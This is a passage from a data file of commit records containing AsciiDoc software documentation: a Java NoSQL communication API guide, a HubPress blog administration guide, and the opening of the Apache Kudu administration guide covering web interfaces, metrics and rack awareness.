operations\nmanager.insert(entity);\nmanager.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanager.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanager.update(entity);\nmanager.update(entities);\n----\n\n===== ColumnFamilyManagerAsync\n\nThe `ColumnFamilyManagerAsync` is the class that manages the persistence on the asynchronous way to column family.\n\n[source,java]\n----\nColumn diana = Column.of(\"name\", \"Diana\");\nentity.add(diana);\n\nList<ColumnEntity> entities = Collections.singletonList(entity);\nColumnFamilyManagerAsync managerAsync = null;\n\n\/\/inserts operations\nmanagerAsync.insert(entity);\nmanagerAsync.insert(entity, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\nmanagerAsync.insert(entities, Duration.ofHours(2L));\/\/inserts with 2 hours of TTL\n\/\/updates operations\nmanagerAsync.update(entity);\nmanagerAsync.update(entities);\n----\n\nSometimes on an asynchronous process, is important to know when this process is over, so the `ColumnFamilyManagerAsync` also has callback support.\n\n[source,java]\n----\nConsumer<ColumnEntity> callBack = e -> {};\nmanagerAsync.insert(entity, callBack);\nmanagerAsync.update(entity, callBack);\n----\n\n===== Search information on a column family\n\n\nThe Column communication API has support to retrieve information from both ways synchronous and asynchronous from the `ColumnQuery` class. The `ColumnQuery` has information such as sort type, document and also the condition to retrieve information.\n\nThe condition on `ColumnQuery` is given from ColumnCondition, which has the status and the column. E.g. The condition behind is to find a name equal \"**Ada**\".\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \u201cAda\u201d));\n----\n\nAlso, the developer can use the aggregators such as **AND**, **OR**, and **NOT**.\n\n[source,java]\n----\nColumnCondition nameEqualsAda = ColumnCondition.eq(Column.of(\"name\", \"Ada\"));\nColumnCondition youngerThan2Years = ColumnCondition.lt(Column.of(\"age\", 2));\nColumnCondition condition = nameEqualsAda.and(youngerThan2Years);\nColumnCondition nameNotEqualsAda = nameEqualsAda.negate();\n----\n\nIf there isn\u2019t condition at the query, that means the query will try to retrieve all information from the database, look like a \u201c`select * from database`\u201d in a relational database, just to remember the return depends on from driver. It is important to say that not all NoSQL databases have support for this resource.\n\n`ColumnQuery` also has pagination feature to define where the data starts, and its limits.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\nColumnQuery query = ColumnQuery query = ColumnQueryBuilder.select().from(\"collection\").where(\"age\").lt(10).and(\"name\").eq(\"Ada\").orderBy(\"name\").asc().limit(10).skip(2).build();\n\nList<ColumnEntity> entities = manager.select(query);\nOptional<ColumnEntity> entity = manager.singleResult(query);\n\nConsumer<List<ColumnEntity>> callback = e -> {};\nmanagerAsync.select(query, callback);\n----\n\n===== Removing information from Column Family\n\nSuch as `ColumnQuery`, there is a class to remove information from the column database type: A `ColumnDeleteQuery` type.\n\nIt is smoother than `ColumnQuery` because there isn\u2019t pagination and sort feature, once this information is unnecessary to remove information from database.\n\n[source,java]\n----\nColumnFamilyManager manager = \/\/instance;\nColumnFamilyManagerAsync managerAsync = \/\/instance;\n\nColumnDeleteQuery query = ColumnQueryBuilder.delete()\n .from(\"collection\").where(\"age\").gt(10).build();\n\nmanager.delete(query);\n\nmanagerAsync.delete(query);\nmanagerAsync.delete(query, v -> {});\n----\n\n\n==== BucketManager\n\nThe `BucketManager` is the class which saves the KeyValueEntity on a synchronous way in key-value database.\n\n[source,java]\n----\nBucketManager bucketManager= null;\nKeyValueEntity<String> entity = KeyValueEntity.of(\"key\", 1201);\nSet<KeyValueEntity<String>> entities = Collections.singleton(entity);\nbucketManager.put(\"key\", \"value\");\nbucketManager.put(entity);\nbucketManager.put(entities);\nbucketManager.put(entities, Duration.ofHours(2));\/\/two hours TTL\nbucketManager.put(entity, Duration.ofHours(2));\/\/two hours TTL\n----\n\n===== Removing and retrieve information from a key-value database\n\nWith a simple structure, the bucket needs a key to both retrieve and delete information from the database.\n\n[source,java]\n----\nOptional<Value> value = bucketManager.get(\"key\");\nIterable<Value> values = bucketManager.get(Collections.singletonList(\"key\"));\nbucketManager.remove(\"key\");\nbucketManager.remove(Collections.singletonList(\"key\"));\n----\n\ninclude::communication_query.adoc[]\n\n=== Factory\n\nThe factory class creates the *Managers*.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n* *BucketManagerFactory*\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\n\n==== Column Family Manager Factory\n\nThe factory classes have the duty to create the column family manager.\n\n* *ColumnFamilyManagerAsyncFactory*\n* *ColumnFamilyManagerFactory*\n\nThe `ColumnFamilyManagerAsyncFactory` and `ColumnFamilyManagerFactory` create the manager synchronously and asynchronously respectively.\n\n[source,java]\n----\nColumnFamilyManagerFactory factory = \/\/instance\nColumnFamilyManagerAsyncFactory asyncFactory = \/\/instance\nColumnFamilyManager manager = factory.get(\"database\");\nColumnFamilyManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Document Collection Factory\n\nThe factory classes have the duty to create the document collection manager.\n\n* *DocumentCollectionManagerFactory*\n* *DocumentCollectionManagerAsyncFactory*\n\nThe `DocumentCollectionManagerAsyncFactory` and `DocumentCollectionManagerFactory` create the manager synchronously and asynchronously respectively.\n\n[source,java]\n----\nDocumentCollectionManagerFactory factory = \/\/instance\nDocumentCollectionManagerAsyncFactory asyncFactory = \/\/instance\nDocumentCollectionManager manager = factory.get(\"database\");\nDocumentCollectionManagerAsync managerAsync = asyncFactory.getAsync(\"database\");\n----\n\nThe factories were separated intentionally, as not all databases support synchronous and asynchronous operations.\n\n==== Bucket Manager Factory\n\nThe factory classes have the duty to create the bucket manager.\n\n\n[source,java]\n----\nBucketManagerFactory bucketManager= \/\/instance\nBucketManager bucket = bucketManager.getBucketManager(\"bucket\");\n----\n\nBeyond the BucketManager, some databases have support for particular structures represented in the Java world such as `List`, `Set`, `Queue` e `Map`.\n\n\n[source,java]\n----\nList<String> list = bucketManager.getList(\"list\", String.class);\nSet<String> set = bucketManager.getSet(\"set\", String.class);\nQueue<String> queue = bucketManager.getQueue(\"queue\", String.class);\nMap<String, String> map = bucketManager.getMap(\"map\", String.class, String.class);\n----\n\nThese methods may return a `java.lang.UnsupportedOperationException` if the database does not support any of the structures.\n\n=== Configuration\n\n\nThe configuration classes create a Manager Factory. This class has all the configuration to build the database connection.\n\nOnce there are a large diversity configuration flavors on such as P2P, master\/slave, thrift communication, HTTP, etc. The implementation may be different, however, they have a method to return a Manager Factory. It is recommended that all database driver providers have a properties file to read this startup information.\n\n\n==== Settings\n\nThe Settings interface represents the settings used in a configuration. It extends a `Map<String, Object>`; for this reason, gives a key that can set any value as configuration.\n\n[source,java]\n----\nSettings settings = Settings.builder().put(\"key\", \"value\").build();\nMap<String, Object> map = ....;\nSettings settings = Settings.of(map);\n----\n\n\n==== Document Configuration\n\nOn the document collection configuration, there are two classes, `DocumentConfiguration` and `DocumentConfigurationAsync` to `DocumentCollectionManagerFactory` and `DocumentCollectionManagerAsyncFactory` respectively.\n\n[source,java]\n----\nDocumentConfiguration configuration = \/\/instance\nDocumentConfigurationAsync configurationAsync = \/\/instance\nDocumentCollectionManagerFactory managerFactory = configuration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database has support for both synchronous and asynchronous, it may use `UnaryDocumentConfiguration` that implements both document configurations.\n\n[source,java]\n----\nUnaryDocumentConfiguration unaryDocumentConfiguration = \/\/instance\nDocumentCollectionManagerFactory managerFactory = unaryDocumentConfiguration.get();\nDocumentCollectionManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Column Configuration\n\nOn the column family configuration, there are two classes, `ColumnConfiguration` and `ColumnConfigurationAsync` to `ColumnFamilyManagerFactory` and `ColumnFamilyManagerAsyncFactory` respectively.\n\n[source,java]\n----\nColumnConfiguration configuration = \/\/instance\nColumnConfigurationAsync configurationAsync = \/\/instance\nColumnFamilyManagerFactory managerFactory = configuration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = configurationAsync.getAsync();\n----\n\nIf a database has support for both synchronous and asynchronous, it may use `UnaryColumnConfiguration` that implements both document configurations.\n\n[source,java]\n----\nUnaryColumnConfiguration unaryDocumentConfiguration = \/\/instance\nColumnFamilyManagerFactory managerFactory = unaryDocumentConfiguration.get();\nColumnFamilyManagerAsyncFactory managerAsyncFactory = unaryDocumentConfiguration.getAsync();\n----\n\n==== Key Value Configuration\n\n\nOn the key-value configuration, there is KeyValueConfiguration to BucketManagerFactory.\n\n[source,java]\n----\nKeyValueConfiguration configuration = \/\/instance\nBucketManagerFactory managerFactory = configuration.get();\n----\n\n=== The diversity on NoSQL database\n\nIn NoSQL world, beyond the several types, it's trivial a particular database has features that do exist on this provider. When there is a change among the types, column family, and document collection, there is a considerable change. Notably, with a switch to the same kind such as column family to column family, e.g., Cassandra to HBase, there is the same problem once Cassandra has featured such as Cassandra query language and consistency level. The communication API allows looking the variety on NoSQL database. The configurations classes, and entity factory return specialist class from a provider.\n\n[source,java]\n----\n public interface ColumnFamilyManagerFactory<SYNC extends ColumnFamilyManager> extends AutoCloseable {\n SYNC get(String database);\n}\n----\n\nA `ColumnFamilyManagerFactory` returns a class that implements `ColumnFamilyManager`. E.g.: Using a particular resource from Cassandra driver.\n\n[source,java]\n----\nCassandraConfiguration condition = new CassandraConfiguration();\ntry(CassandraDocumentEntityManagerFactory managerFactory = condition.get()) {\n CassandraColumnFamilyManager columnEntityManager = managerFactory.get(KEY_SPACE);\n ColumnEntity entity = ColumnEntity.of(COLUMN_FAMILY);\n Column id = Column.of(\"id\", 10L);\n entity.add(id);\n entity.add(Column.of(\"version\", 0.001));\n entity.add(Column.of(\"name\", \"Diana\"));\n entity.add(Column.of(\"options\", Arrays.asList(1, 2, 3)));\n columnEntityManager.save(entity);\n \/\/common implementation\n ColumnQuery query = ColumnQuery.of(COLUMN_FAMILY);\n query.and(ColumnCondition.eq(id));\n Optional<ColumnEntity> result = columnEntityManager.singleResult(query);\n \/\/cassandra implementation\n columnEntityManager.save(entity, ConsistencyLevel.THREE);\n List<ColumnEntity> entities = columnEntityManager.cql(\"select * from newKeySpace.newColumnFamily\");\n System.out.println(entities);\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3811d98f8f90aeee0086fd8d45ba4e3ad0b3eda6","subject":"Migrated Admin content to gitbook","message":"Migrated Admin content to gitbook","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/Administration.adoc","new_file":"docs\/Administration.adoc","new_contents":"","old_contents":":toc: macro\n:toclevels: 4\n:sectnums:\n\n= Administration Guide\n\nThis guide will help you get the most out of your HubPress blog. It will teach you how to configure the various features of your blog so you can make it your own.\n\nIf you don't care too much about customising your blog at this stage, and just want to start writing, review the helpful info in the link:Writers_Guide.adoc[Writer's Guide] to get you writing blog posts the right way.\n\nNOTE: You do not need any special systems administrtion knowledge to use HubPress. We've split out the Administration information so the README remains small in size.\n\ntoc::[]\n\n== About the Administration Console\n\nThe HubPress Administration Console is available at *\/hubpress*:\n\n* `https:\/\/[username].github.io\/hubpress\/` for GitHub Hosted blogs, or\n* `https:\/\/[username].github.io\/[repositoryName]\/hubpress\/` for Domain Hosted blogs.\n* `https:\/\/[cname_domain]\/hubpress` for custom domain-hosted (CNAME) blogs.\n\nNOTE: If you are using a CNAME, you might need to access your Administration console using the `https:\/\/<username>.github.io` address pattern initially, so your CNAME redirect will work.\n\n== Log Into the Administration Console\n\nimage:http:\/\/hubpress.io\/img\/login.png[Install complete,300]\n\nEnter your GitHub credentials to log into HubPress Admin.\n\nOnce you authenticate, a personal token is created for future calls from HubPress to the GitHub API.\n\nThis is synchronized across all sessions of HubPress.\nIf you open the Administration Console on your PC and then your Tablet, the token is applicable to all devices.\n\n== Posts View\n\nThe `Posts` view is the default view you see when you first log onto HubPress\n\nWhen you first start HubPress, the `Posts` view is empty.\nAs you create blog posts, the page populates with the list of posts on the left, and a rendered preview of the blog post itself on the right.\n\n=== Add a Blog Post\n\nTo start blogging with HubPress, click the pencil icon in the top right of the screen.\n\nThis creates an empty blog post for you, ready for your next great idea, or discovery you want to tell the world about.\n\nThere are certain structural requirements you must meet in a HubPress blog post, before it can be saved and published to your blog site. See the link:Writers_Guide.adoc[Writer's Guide] for tips about creating posts successfully with HubPress.\n\n=== Edit or Delete a Blog Post\n\n.New in 0.5.0\nNOTE: You can now delete blog posts instead of having to rename them and use them again later.\n\nIf you have a post you need to edit to delete, you can do so by accessing the Action Overflow (three dots) menu.\n\nThis menu contains the `Edit` and `Delete` functions applicable to each post.\n\n== Settings View\n\nYou can configure basic blog settings (such as CNAME and Pagination) and social media accounts you want to connect to your blog.\n\nEach settings group is separated into tabs, to logically group the settings.\n\n.How To Access the Settings View\n. On the Posts View, click the Menu button.\n. Click Settings to load the Settings view.\n\n=== Meta\n\nThis tab contains basic information configured in the `\/hubpress\/config.json` file.\n\nThe following fields are configurable:\n\nGit CNAME::\n Lets you specify a custom domain name for your blog.\n See https:\/\/help.github.com\/articles\/setting-up-a-custom-domain-with-github-pages\/[Setting Up A Custom Domain] for instructions about setting up a CNAME for your blog.\nLive Preview Render Delay::\n Controls how long the live render takes to refresh, in milliseconds.\n For fast typists, setting this field to a value over `2000` (two seconds) will result in a smoother editing experience because the live preview will not be regenerated so frequently.\n Setting this value below `2000` will result in the live preview refreshing faster, but may result in some visible cursor delay when typing.\n\n=== Site\n\n==== Title and Description\n\nThe *Title* and *Description* fields allow you to give your blog a name, and tell visitors what they can expect from your blog posts.\n\n==== Logo and Cover Image\n\nThe *Logo* and *Cover Image* fields allow you to specify art asset that will be used on each page of your blog:\n\n* An HTML link to an image hosting service. For example gravatar, for your avatar.\n* A link to an image committed to the \/images directory of your blog repository.\n\nIMPORTANT: The format you specify in these fields is important for repository-hosted images.\n\nYou must use the pattern `\/images\/<filename>` so the static site generator can create the image paths to each sub-page of your blog.\nFailing to specify the leading forward-slash will mean the absolute path generated in the HTML pages will break.\nYou'll know this has happened when Page 2 of your blog onwards does not have any cover or logo images.\n\nSee the link:Writers_Guide.adoc#Adding_Images[Adding Images] section in the Writer's Guide for more information about using Images.\n\n==== Theme\n\nThe *Theme* is selectable from the list of themes stored in the `\/themes` directory.\n\nThis field is a free-text field, but you need to specify the theme according to the folder name.\nThe current folder names are:\n\n* casper\n* ghostium\n* ichi\n* roon\n* saga\n* uno\n* uno-zen\n\n.New in 0.5.0\nNOTE: Theme names have all been changed to lowercase for consistency.\nIf you find your theme is not loading, check the site settings and adjust the names accordingly.\n\n==== Google Analytics\n\nThe *Google Analytics* field takes the Google Analytics Tracking ID of your site. For example `UA-1234567-1`.\n\n==== Disqus Shortname\n\nThe *Disqus shortname* field takes your Disqus user name that you specified when registering a new site for Disqus.\n\nOnly the shortname is required, not a link to your profile page.\n\nIf you have not enabled Disqus for your site, create a site profile at https:\/\/disqus.com\/admin\/create\/ with the name of your blog to get started.\n\n=== Social Network\n\nAll fields in this group require full URLs to your public profile page.\nThe way these values are rendered on your blog depends on the theme selected.\n\n== Update HubPress\n\nBecause HubPress is hosted on GitHub, you can update by pulling down the latest changes from the HubPress master repository.\n\nIf you're new to GitHub, the repository you forked the project from is referred to as `Upstream`.\n\nYou update HubPress by creating a Pull Request (PR) against the hubpress.io upstream repository.\n\nWith the cross-compare fork feature of GitHub, you can easily update to the latest version.\n\n.How To Update Your HubPress Instance to the Latest Version\n. Click the `Compare` button in your HubPress repository.\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_01.png[Click Compare button]\n+\n. Change the base fork to your repository, and set the branch according to your repository configuration (`master` or `gh-pages`).\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_02.png[Set the base fork]\n+\n. Select `Compare across forks`.\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_03.png[Click compare across forks]\n+\n. Change the head fork to the `HubPress\/hubpress.io` repository.\n+\nimage::https:\/\/raw.githubusercontent.com\/HubPress\/dev.hubpress.io\/e57b221\/docs\/images\/maintain_the_latest_hubpress_04.png[Set the head fork]\n+\n. Create the Pull Request.\n. Apply the Pull Request to your instance of HubPress.\n\nYou can use the most recent HubPress version after apply the PR to your repository.\n\nFor a video demonstration of the PR process, see the following YouTube video.\n\nvideo::KCylB780zSM[youtube]\n\nhttps:\/\/www.youtube.com\/watch?v=KCylB780zSM[Updating HubPress]\n\n== Use HubPress with Multiple Users\n\n.New in 0.5.0\nNOTE: You can now work as a team on blog posts.\nEach user granted access to the blog instance is credited with their GitHub name on posts they create.\n\nYou can use the same HubPress instance with multiple authors by adding contributors to the repo in which HubPress is hosted.\n\nAttribution::\n Posts are attributed based on the first person who created the blog post entry.\n Edits by other contributors are attributed to the first person who created the post.\nSite Changes::\n Changes to settings (themes, blog name, social links) _will not_ affect the author data attributed to each post.\n\n.How To Add Contributors to your HubPress Repository\n. Open your HubPress site on GitHub.\n. Click `Settings` => `Collaborators`.\n. Add the GitHub users for which you want to grant access to your blog.\n\nOnce you have added contributors, they will be notified by the GitHub notification system. Once they accept the invitation, they can instantly contribute to content development on the blog.\n\n== Troubleshooting\n\nHubPress' unique authoring environment is backed by a locally-stored database, specific to your Browser and Operating System.\n\nIf you switch devices or browser instances, you lose the synchronicity between browsers.\nHubPress subsequently gets a globally-corrupted GitHub authentication token and any attempts to synchronize any changes from the primary Chrome instance fails.\n\nIn most cases, resetting the Hosted App Data in the browser is all it takes to bring normality back to your HubPress fork.\n\n=== Resetting Blog Database on Android\n\nClear the browser Cache and Data in Android.\n\n. Tap Settings > Apps > Chrome.\n. Clear Cache and Data.\n. Restart the Chrome App.\n\nHubPress is forced to rebuild the local database, and will resync its GitHub authentication token.\n\n=== Resetting Blog Database on Desktop\n\nChrome Desktop shares similar behavior with Chrome for Android.\n\nRather than having to reset the entire cache and data in the app, Chrome Desktop is a little less extreme in what you need to reset.\n\n. Close the malfunctioning HubPress tab in the browser.\n. Click `Settings`.\n. Click `Show advanced settings`.\n. In the `Privacy` group, click `Clear browsing data`.\n. Select \"Obliterate the following items from: `The beginning of time`\".\n. Clear all check-marks *except for* `Hosted app data`.\n. Click `Clear browsing data`.\n. Open a tab, and load the HubPress Admin Console for your blog.\n. Attempt to republish a post.\n\nYou should have a successful post publish where the process previously failed.\n\n== Frequently Asked Questions\n\nThere are some commonly-asked questions in the issue tracker that are worth calling out here.\n\n=== Can I Specify Other Asciidoctor Backends?\n\nHubPress only supports the HTML5 backend.\n\nSpecifying other backend types will result in an error similar to:\n\n Uncaught RuntimeError: asciidoctor: FAILED: missing converter for backend 'deckjs'. Processing aborted.\n\nIf you do want to use a different backend to process your AsciiDoc files, the http:\/\/asciidoctor.org\/docs\/user-manual\/#selecting-an-output-format[Asciidoctor User Guide] can help you work out the backend that is right for you, for use with the +asciidoctor+ command-line script.\n\n=== Can I create posts in my repository, and not through the interface?\n\nYou can edit your posts in a local copy of your HubPress repository, however you will need to log onto HubPress Admin to publish your post.\n\nIf you want a near WYSIWYG interface to edit your AsciiDoc files, applications like http:\/\/atom.io[Atom Editor] or http:\/\/asciidocfx.com[AsciidocFX Editor] are excellent choices.\n\n== Donations\n\nHubPress is now on https:\/\/gratipay.com\/hubpress\/[Gratipay]!\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/12901016\/7b09da22-ceb9-11e5-93f7-16ab135b2e2e.png[]\n\nIt's not the only way you can help us, but it is certainly a welcome one.\nDonations are a great way to show your appreciation for the platform: it inspires us to dedicate extra time away from our families and day jobs to make HubPress an awesome blogging platform for you.\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/12901085\/cc5ee908-ceb9-11e5-9d8b-c526f081f1e9.png[]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"200509b497a028f7d700152ca4c92818ce5b9f0e","subject":"docs: add docs for maintenance mode","message":"docs: add docs for maintenance mode\n\nA staged version can be found here:\nhttps:\/\/github.com\/andrwng\/kudu\/blob\/docs_maintenance_mode\/docs\/administration.adoc#minimizing_cluster_disruption_during_temporary_single_ts_downtime\n\nChange-Id: I36b9eddc1d4d4a4e4cb149058fc6d6f438e47f1f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/14718\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface,\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\n- `\/metrics?level=info` - limits the returned metrics based on their severity level.\nThe levels are ordered and lower levels include the levels above them. If no level is specified,\n`debug` is used to include all metrics. The valid values are:\n * `debug` - Metrics that are diagnostically helpful but generally not monitored\n during normal operation.\n * `info` - Generally useful metrics that operators always want to have available\n but may not be monitored under normal circumstances.\n * `warn` - Metrics which can often indicate operational oddities, which may need more investigation.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Diagnostics Logging\n\nKudu may be configured to dump various diagnostics information to a local log file.\nThe diagnostics log will be written to the same directory as the other Kudu log files, with a\nsimilar naming format, substituting `diagnostics` instead of a log level like `INFO`.\nAfter any diagnostics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nEach line in the diagnostics log consists of the following components:\n\n* A human-readable timestamp formatted in the same fashion as the other Kudu log files.\n* The type of record. For example, a metrics record consists of the word `metrics`.\n* A machine-readable timestamp, in microseconds since the Unix epoch.\n* The record itself.\n\nCurrently, the only type of diagnostics record is a periodic dump of the server metrics.\nEach record is encoded in compact JSON format, and the server attempts to elide any metrics\nwhich have not changed since the previous record. In addition, counters which have never\nbeen incremented are elided. Otherwise, the format of the JSON record is identical to the\nformat exposed by the HTTP endpoint above.\n\nThe frequency with which metrics are dumped to the diagnostics log is configured using the\n`--metrics_log_interval_ms` flag. By default, Kudu logs metrics every 60 seconds.\n\n[[rack_awareness]]\n== Rack Awareness\n\nAs of version 1.9, Kudu supports a rack awareness feature. Kudu's ordinary\nre-replication methods ensure the availability of the cluster in the event of a\nsingle node failure. However, clusters can be vulnerable to correlated failures\nof multiple nodes. For example, all of the physical hosts on the same rack in\na datacenter may become unavailable simultaneously if the top-of-rack switch\nfails. Kudu's rack awareness feature provides protection from some kinds of\ncorrelated failures, like the failure of a single rack in a datacenter.\n\nThe first element of Kudu's rack awareness feature is location assignment. When\na tablet server or client registers with a master, the master assigns it a\nlocation. A location is a `\/`-separated string that begins with a `\/` and where\neach `\/`-separated component consists of characters from the set\n`[a-zA-Z0-9_-.]`. For example, `\/dc-0\/rack-09` is a valid location, while\n`rack-04` and `\/rack=1` are not valid locations. Thus location strings resemble\nabsolute UNIX file paths where characters in directory and file names are\nrestricted to the set `[a-zA-Z0-9_-.]`. Presently, Kudu does not use the\nhierarchical structure of locations, but it may in the future. Location\nassignment is done by a user-provided command, whose path should be specified\nusing the `--location_mapping_cmd` master flag. The command should take a single\nargument, the IP address or hostname of a tablet server or client, and return\nthe location for the tablet server or client. Make sure that all Kudu masters\nare using the same location mapping command.\n\nThe second element of Kudu's rack awareness feature is the placement policy,\nwhich is\n\n Do not place a majority of replicas of a tablet on tablet servers in the same location.\n\nThe leader master, when placing newly created replicas on tablet servers and\nwhen re-replicating existing tablets, will attempt to place the replicas in a\nway that complies with the placement policy. For example, in a cluster with five\ntablet servers `A`, `B`, `C`, `D`, and `E`, with respective locations `\/L0`,\n`\/L0`, `\/L1`, `\/L1`, `\/L2`, to comply with the placement policy a new 3x\nreplicated tablet could have its replicas placed on `A`, `C`, and `E`, but not\non `A`, `B`, and `C`, because then the tablet would have 2\/3 replicas in\nlocation `\/L0`. As another example, if a tablet has replicas on tablet servers\n`A`, `C`, and `E`, and then `C` fails, the replacement replica must be placed on\n`D` in order to comply with the placement policy.\n\nIn the case where it is impossible to place replicas in a way that complies with\nthe placement policy, Kudu will violate the policy and place a replica anyway.\nFor example, using the setup described in the previous paragraph, if a tablet\nhas replicas on tablet servers `A`, `C`, and `E`, and then `E` fails, Kudu will\nre-replicate the tablet onto one of `B` or `D`, violating the placement policy,\nrather than leaving the tablet under-replicated indefinitely. The\n`kudu cluster rebalance` tool can reestablish the placement policy if it is\npossible to do so. The `kudu cluster rebalance` tool can also be used to\nestablish the placement policy on a cluster if the cluster has just been\nconfigured to use the rack awareness feature and existing replicas need to be\nmoved to comply with the placement policy. See\n<<rebalancer_tool_with_rack_awareness,running the 